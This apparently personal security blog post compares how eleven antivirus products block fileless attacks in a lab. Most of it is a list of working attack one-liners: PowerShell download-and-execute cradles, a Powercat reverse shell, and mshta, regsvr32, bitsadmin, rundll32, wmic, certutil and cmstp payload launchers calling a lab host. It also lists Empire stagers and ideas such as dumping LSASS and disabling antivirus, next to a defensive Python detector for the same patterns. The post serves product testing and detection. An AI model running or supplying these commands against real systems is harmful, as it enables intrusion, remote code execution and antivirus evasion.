
Fileless malware: AV comparison on fileless attack

I’ve tested some fileless commands in my lab with AV protection (most of them are free/trial versions) and here’s the result.

Symbol: Description
✔️: Blocked
(no mark): Bypassed

Products tested: Bitdefender, Avast, Symantec, Webroot, ESET, Kaspersky, Sophos, TrendMicro, WinDef, Malwarebytes, Panda Adaptive

Fileless technique: blocked marks
koadic mshta: ✔️✔️✔️
koadic regsvr: ✔️✔️✔️✔️✔️✔️✔️
koadic rundll32_js: ✔️✔️✔️✔️✔️✔️✔️
koadic bitsadmin: ✔️✔️✔️✔️✔️✔️
koadic disk: ✔️✔️✔️✔️✔️✔️
koadic wmic: ✔️✔️✔️✔️✔️✔️✔️
Malicious PowerShell line: ✔️✔️✔️✔️✔️✔️
msfvenom msiexec: ✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
msfvenom certutil: ✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
msfvenom batch: ✔️✔️✔️✔️✔️
msfvenom cscript (vbs): ✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
Powercat: ✔️✔️✔️✔️✔️

Testcase

My test cases mostly use msfvenom with Metasploit and Koadic.

Powershell

Download and execute executable

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe'); Start-Process -Filepath '%temp%\evil.exe'"

Execute Ps1 file

powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://192.168.5.128/a.ps1\");powershell -nop -w hidden -c IEX $e

Powercat

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.189.131:7777/powercat.ps1');powercat -c 192.168.189.131 -p 9999 -e cmd"

Msfvenom batch

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.189.131:7777/ms.bat'))"

Msfvenom VBScript

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/ms.vbs', '%temp%\ms.vbs'); Start-Process %windir%\system32\cscript.exe -Filepath '%temp%\ms.vbs'"

Powershell empire stager

windows/launcher_bat
windows/launcher_lnk
windows/launcher_sct
windows/launcher_vbs
windows/launcher_xml
windows/backdoorLnkMacro
windows/macro
windows/bunny
windows/macroless_msword
windows/csharp_exe
windows/shellcode
windows/dll
windows/teensy
windows/ducky
windows/hta

Koadic

Mshta

mshta http://192.168.189.131:9999/tT4Fh

Regsvr32

regsvr32 /s /u /n /i:http://192.168.189.131:9998/d2XfT scrobj

Bitsadmin

bitsadmin /transfer oZHsz /download /priority high http://192.168.189.131:9995/oZHsz.wsf %temp%\oZHsz.wsf & start /wait %temp%\oZHsz.wsf & del %temp%\oZHsz.wsf

Rundll32

rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://192.168.189.131:9997/eTMXy",false);x.send();eval(x.responseText);window.close();

Wmic

wmic os get /FORMAT:"http://192.168.189.131:9996/pMeV8.xsl"

wmic process call create "powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe'); Start-Process -Filepath '%temp%\evil.exe'" "

Others

Certutil

certutil.exe -urlcache -split -f http://192.168.189.131:7777/ms.exe ms.exe & ms.exe

Cmstp

cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf

Disk payload

New tool by thelinuxchoice

git clone https://github.com/thelinuxchoice/catchyou
cd catchyou
bash catchyou.sh
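As an added defender-side example (not part of the original post), the following Python script scans process-creation command lines for the LOLBin and download-cradle patterns used in the test cases above (mshta, regsvr32/scrobj, bitsadmin, rundll32 javascript:, wmic XSL and process create, certutil -urlcache, cmstp, PowerShell DownloadString/IEX). The log records are constructed, with the 192.0.2.0/24 documentation range standing in for the lab host.

```python
import re

# One rule per technique from the test cases above: (label, regex over the full command line).
RULES = [
    ("mshta remote", re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("regsvr32 scrobj", re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\b", re.I)),
    ("bitsadmin download", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*/download\b", re.I)),
    ("rundll32 javascript", re.compile(r"\brundll32(\.exe)?\b.*\bjavascript:", re.I)),
    ("wmic xsl", re.compile(r"\bwmic(\.exe)?\b.*/format:\s*.?https?://", re.I)),
    ("wmic process create", re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("certutil urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("cmstp remote inf", re.compile(r"\bcmstp(\.exe)?\b.*/ni\b.*/s\b.*https?://", re.I)),
    ("powershell download cradle", re.compile(r"\bpowershell(\.exe)?\b.*Download(String|File)\s*\(", re.I)),
    ("powershell hidden/IEX", re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|\bIEX\b|Invoke-Expression)", re.I)),
]


def match_rules(cmdline):
    """Return the labels of every rule the command line triggers (empty list means no hit)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(records):
    """records: iterable of 'host|user|commandline' strings. Returns [(host, user, labels), ...]."""
    findings = []
    for rec in records:
        host, user, cmd = rec.rstrip("\n").split("|", 2)  # maxsplit keeps '|' inside the command
        hits = match_rules(cmd)
        if hits:
            findings.append((host, user, hits))
    return findings


# Constructed sample records (not real telemetry); 192.0.2.10 stands in for the lab host.
SAMPLE_LOG = [
    "ws01|alice|regsvr32 /s C:\\Program Files\\App\\helper.dll",
    "ws01|alice|certutil -hashfile C:\\Users\\alice\\setup.msi SHA256",
    "ws02|bob|mshta http://192.0.2.10:9999/tT4Fh",
    "ws02|bob|regsvr32 /s /u /n /i:http://192.0.2.10:9998/d2XfT scrobj",
    "ws03|svc|wmic os get /FORMAT:\"http://192.0.2.10:9996/pMeV8.xsl\"",
    "ws03|svc|powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10:7777/a.ps1')\"",
    "ws04|carol|powershell -Command Get-Process | Sort-Object CPU",
]

if __name__ == "__main__":
    for host, user, hits in scan(SAMPLE_LOG):
        print(f"{host} {user}: {', '.join(hits)}")
```

In practice the records would come from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled; the benign regsvr32 and certutil lines in the sample show why the rules key on the remote-fetch arguments rather than on the binary name alone.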

Others to consider when doing an AV PoC (including non-fileless)

  1. Powersploit
  2. Powertools
  3. Powerview
  4. Other PowerShell-invoking modules
  5. Powershell script
  6. Veil evasion
  7. Cobalt Strike payloads
  8. Metasploit various payloads
  9. Maldoc
  10. Exploit
  11. Process injection
  12. Credential harvesting tools
  13. LSASS dump
  14. Disable, kill, sleep AV services/process behavior
  15. Modifying AV registry
  16. Refer Mitre for more ideas

Note

Msfvenom payloads are easily detected by AV because of their popularity among attackers and their well-recognized patterns.

This post is licensed under CC BY 4.0 by the author.